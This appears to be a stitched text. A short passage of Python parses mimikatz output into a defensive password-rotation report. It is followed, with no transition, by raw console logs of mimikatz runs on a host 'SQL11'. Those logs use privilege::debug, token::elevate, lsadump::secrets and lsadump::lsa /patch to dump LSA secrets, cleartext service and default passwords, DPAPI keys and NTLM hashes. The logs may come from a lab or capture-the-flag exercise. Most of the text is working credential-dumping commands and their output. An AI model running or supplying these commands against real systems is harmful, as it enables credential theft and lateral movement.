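                exp.cleartext.add(pw)

    provider, fields = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith('Authentication Id') or PROVIDER.fullmatch(line):
            record(provider, fields)
            provider = line.split()[0] if PROVIDER.fullmatch(line) else None
            fields = {}
            continue
        m = FIELD.match(line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    record(provider, fields)
    return exposures


def rotation_report(exposures: Dict[str, Exposure]) -> List[Tuple[str, str]]:
    """Principals whose secrets sat in LSASS, most urgent first."""
    rows = []
    for key, e in exposures.items():
        machine = key.endswith('$')
        if e.cleartext and not machine:
            rows.append((1, key, 'cleartext password recovered: reset now and check for reuse'))
        elif e.ntlm and not machine:
            rows.append((2, key, 'NTLM hash recovered: reset password (pass-the-hash risk)'))
        elif machine and (e.ntlm or e.key_blob):
            rows.append((3, key, 'computer account secret recovered: reset the machine account password'))
    rows.sort()
    return [(key, why) for _, key, why in rows]
```

Run against the constructed SAMPLE, `rotation_report(parse_logon_passwords(SAMPLE))` lists tina first (cleartext), the local Administrator second (hash only) and the SQL11$ computer account last. The machine account is kept separate on purpose: its "password" in the kerberos section is key material, it is reset by the computer itself on its normal schedule, and it is the one entry where forcing a reset changes the host's domain trust rather than a user's login.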

c:\Windows\Tasks>mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"
mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"

  .#####.   mimikatz 2.2.0 (x64) #18362 Jan  4 2020 18:59:26
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM

500	{0;000003e7} 1 D 29153     	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Primary
 -> Impersonated !
 * Process Token : {0;000003e7} 0 D 3741924   	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,28p)	Primary
 * Thread Token  : {0;000003e7} 1 D 3776912   	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Impersonation (Delegation)

mimikatz(commandline) # lsadump::secrets
Domain : SQL11
SysKey : 339b21aeb30e1cc69a4269eda74b7b29

Local name : SQL11 ( S-1-5-21-2852705690-387487691-3395496674 )
Domain name : FINAL ( S-1-5-21-1725955968-4040474791-670206374 )
Domain FQDN : final.com

Policy subsystem is : 1.18
LSA Key(s) : 1, default {13a2a494-c2df-1380-6626-a1b48495068b}
  [00] {13a2a494-c2df-1380-6626-a1b48495068b} f9b2d8d0b9420958530db18bec0a0cd551f3a1f24029ef8c912e2d898d7ffada

Secret  : $MACHINE.ACC
cur/hex : c2 9c 23 bf cc d8 91 35 ed a5 66 19 ee d1 bf 2e 74 70 22 1d ad 5b ca ff 9f 11 73 4e 18 bd b3 26 a2 86 29 20 cc 08 40 e6 c9 b9 39 1b 02 4d 65 e8 63 cd 73 d6 f7 7c 7f 55 aa b4 bc 61 97 9a 5b fd 13 7c 69 95 76 f7 8b bf b0 8a 51 eb 59 dd a2 98 90 ad 25 d2 17 ba e6 f4 89 dd b2 d2 42 f7 46 56 0b dc 33 4f cb 07 5f 78 6e 5e 99 01 06 f7 ed f4 06 28 9a fb d7 a0 ae 00 8c 95 42 07 75 ca e9 08 09 16 06 22 ad 4e ba 2a 04 65 57 c4 5e a9 85 a7 f2 48 ce c4 b4 5c 6c d4 20 b2 15 4a e1 67 7b 9f fc fa 99 c9 be 27 3d f9 d0 23 e3 21 6d b5 58 57 42 5e 7b aa e4 81 2e 52 b2 e5 40 a6 26 8a 11 c9 c3 32 04 4f 84 ef 4c e0 a8 d4 f4 a1 4b 83 6a 7a f6 c4 e7 23 ae 1e 01 06 6e ad ae e2 a1 b1 d3 34 98 e8 cb 28 67 15 9c ff 45 2f 4a a2 0f 84 91 96 
    NTLM:d218ba4449ccace7ecfa7f21440f42c6
    SHA1:7cb17f9fe3620ca8594301a73a0076485f0e3a7b
old/hex : 74 76 28 1d 32 31 ac 9f 76 a1 da fd 29 12 5f 4b d8 6f b1 f2 28 7a ff 05 df 96 1f 09 5f 07 36 ca 94 02 dc 0e 89 9a d9 15 9b c0 01 e3 f2 99 e7 d2 2f c4 60 c0 46 33 25 8b e6 cc 32 5d 73 eb 90 da b3 88 57 9d 1a 27 f7 62 f0 5e 32 63 45 f8 51 28 05 fd 54 52 43 2e 94 10 1e 70 bc 51 a0 ed f6 53 7c f6 54 df b3 76 3e 9d 69 1b 60 bf 39 95 04 24 b1 2d c9 8e 46 a6 59 85 b6 f8 cd 4d 3a 83 79 cd 97 01 23 c9 da e5 a8 7c 65 bf 11 cc fb d1 63 27 5c 22 87 53 e2 59 fe 17 94 79 52 00 8b cf ed 3a e6 68 f7 04 75 f3 93 59 ef 6a 87 c8 4a 6b 0e 33 47 ef 8e 86 d5 ba 95 95 55 22 42 ec 7a 8c 68 a6 02 d4 9a 01 a8 ee e1 b7 5e 53 ea fa a7 61 ad a3 5f 2b e4 c3 a6 af 3d 68 f7 b4 72 19 f5 15 7a b7 b0 f7 58 b7 e5 cc b2 1c b6 d8 2a 5d 57 12 ab 1c 
    NTLM:749a0f74545e7a228bd4614a44b027e1
    SHA1:27ea897e4aaee4f58bbf6cc1f4534ec0d6cea28a

Secret  : DefaultPassword
cur/text: df54ikosdfGFkoal

Secret  : DPAPI_SYSTEM
cur/hex : 01 00 00 00 25 b2 1f 06 9c ac 36 7f 08 cd 33 6e e2 de c0 6f a9 1a c1 21 7e fa 31 4c 98 7a 9d 43 db 88 61 4f bd da 2f 41 45 12 94 e0 
    full: 25b21f069cac367f08cd336ee2dec06fa91ac1217efa314c987a9d43db88614fbdda2f41451294e0
    m/u : 25b21f069cac367f08cd336ee2dec06fa91ac121 / 7efa314c987a9d43db88614fbdda2f41451294e0
old/hex : 01 00 00 00 19 80 17 9b 5e d6 b8 e7 16 68 75 b4 a8 45 13 e2 05 53 be c2 b8 4c 00 84 98 8a 0d 98 97 60 f6 bf fd 08 c1 54 db 51 e4 9f 
    full: 1980179b5ed6b8e7166875b4a84513e20553bec2b84c0084988a0d989760f6bffd08c154db51e49f
    m/u : 1980179b5ed6b8e7166875b4a84513e20553bec2 / b84c0084988a0d989760f6bffd08c154db51e49f

Secret  : NL$KM
cur/hex : 6f 40 10 60 3f c0 56 74 0b 3b 54 5f 6e a3 6e 28 0d 3f 34 8a 63 cd 0e 8c 0a 66 89 e6 96 88 0e 21 a3 58 96 04 55 ec 92 ed ea 56 0c ee 9a 4a 5b bf ba 6a 8a 77 32 99 3e e0 4a 60 a0 7d 6d 16 a9 ce 
old/hex : 6f 40 10 60 3f c0 56 74 0b 3b 54 5f 6e a3 6e 28 0d 3f 34 8a 63 cd 0e 8c 0a 66 89 e6 96 88 0e 21 a3 58 96 04 55 ec 92 ed ea 56 0c ee 9a 4a 5b bf ba 6a 8a 77 32 99 3e e0 4a 60 a0 7d 6d 16 a9 ce 

Secret  : _SC_MSSQL$SQLEXPRESS / service 'MSSQL$SQLEXPRESS' with username : [email protected]
cur/text: fsdDFklsdf90sdfwd
old/text: fdfk435sDFSsda

Secret  : _SC_SQLTELEMETRY$SQLEXPRESS / service 'SQLTELEMETRY$SQLEXPRESS' with username : NT Service\SQLTELEMETRY$SQLEXPRESS

mimikatz(commandline) # exit
Bye!

c:\Windows\Tasks>mimikatz.exe "privilege::debug" "token::elevate" "lsadump::lsa /patch" "exit"
mimikatz.exe "privilege::debug" "token::elevate" "lsadump::lsa /patch" "exit"

  .#####.   mimikatz 2.2.0 (x64) #18362 Jan  4 2020 18:59:26
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM

500	{0;000003e7} 1 D 29153     	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Primary
 -> Impersonated !
 * Process Token : {0;000003e7} 0 D 3777659   	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,28p)	Primary
 * Thread Token  : {0;000003e7} 1 D 3812644   	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Impersonation (Delegation)

mimikatz(commandline) # lsadump::lsa /patch
Domain : SQL11 / S-1-5-21-2852705690-387487691-3395496674

RID  : 000001f4 (500)
User : Administrator
LM   : 
NTLM : 8388d07604009d14cbb78f7d37b9e887

RID  : 000001f7 (503)
User : DefaultAccount
LM   : 
NTLM : 

RID  : 000001f5 (501)
User : Guest
LM   : 
NTLM : 

RID  : 000001f8 (504)
User : WDAGUtilityAccount
LM   : 
NTLM : f90cd2b4344b58aaff84e0ba6edd8550

mimikatz(commandline) # exit
Bye!

c:\Windows\Tasks>